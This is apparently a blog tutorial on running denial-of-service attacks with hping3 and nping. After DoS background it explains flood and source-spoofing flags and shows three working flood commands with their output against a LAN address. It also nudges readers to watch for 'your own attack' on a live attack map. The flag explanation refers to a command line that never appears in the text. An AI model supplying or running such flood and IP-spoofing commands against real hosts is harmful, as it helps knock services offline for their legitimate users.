Denial-of-service Attack – DOS using hping3 with spoofed IP in Linux

In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.

Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.
As clarification, distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour.
Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.
Denial-of-service threats are also common in business, and are sometimes responsible for website attacks.

This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games, such as popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of ‘Internet Street Protests’. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.
One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.
I recently published another post that shows you DOS attack map in Realtime. So if you got a good connection and enough bandwidth, hey, you might even see your own attack on that map.

What’s hping3?

hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time.

Like most tools used in computer security, hping3 is useful to security experts, but there are a lot of applications related to network testing and system administration.

Let me explain the syntax’s used in this command:

1. hping3 = Name of the application binary.
2. -c 100000 = Number of packets to send.
3. -d 120 = Size of each packet that was sent to target machine.
4. -S = I am sending SYN packets only.
5. -w 64 = TCP window size.
6. -p 21 = Destination port (21 being FTP port). You can use any port here.
7. --flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.
8. --rand-source = Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.
9. www.hping3testsite.com = Destination IP address or target machines IP address. You can also use a website name here. In my case resolves to 127.0.0.1 (as entered in /etc/hosts file)

So how do you know it’s working? In hping3 flood mode, we don’t check replies received (actually you can’t because in this command we’ve used –rand-souce flag which means the source IP address is not yours anymore.)

Took me just 5 minutes to completely make this machines unresponsive (that’s the definition of DOS – Denial of Service).

In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really really slow.

Simple SYN flood – DOS using HPING3

root@VHacker:~# hping3 -S --flood -V 192.168.0.106

using eth0, addr: 192.168.0.102, MTU: 1500

HPING 192.168.0.106 (eth0 192.168.0.106): S set, 40 headers + 0 data bytes

hping in flood mode, no replies will be shown

^C

--- 192.168.0.106 hping statistic ---

3041715 packets transmitted, 0 packets received, 100% packet loss

round-trip min/avg/max = 0.0/0.0/0.0 ms

root@VHacker:~# 

 

Simple SYN flood with spoofed IP – DOS using HPING3

root@VHacker:~# hping3 -S -P -U --flood -V --rand-source 192.168.0.106

using eth0, addr: 192.168.0.102, MTU: 1500

HPING 192.168.0.106 (eth0 192.168.0.106): SPU set, 40 headers + 0 data bytes

hping in flood mode, no replies will be shown

^C

--- 192.168.0.106 hping statistic ---

7215481 packets transmitted, 0 packets received, 100% packet loss

round-trip min/avg/max = 0.0/0.0/0.0 ms

root@VHacker:~# 

 

TCP connect flood  – DOS using NPING

root@VHacker:~# nping --tcp-connect -rate=90000 -c 900000 -q 192.168.0.106

Starting Nping 0.6.47 ( http://nmap.org/nping ) at 2014-11-16 18:27 IST

Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A

TCP connection attempts: 900000 | Successful connections: 0 | Failed: 900000 (100.00%)

Nping done: 1 IP address pinged in 12.96 seconds

root@VHacker:~#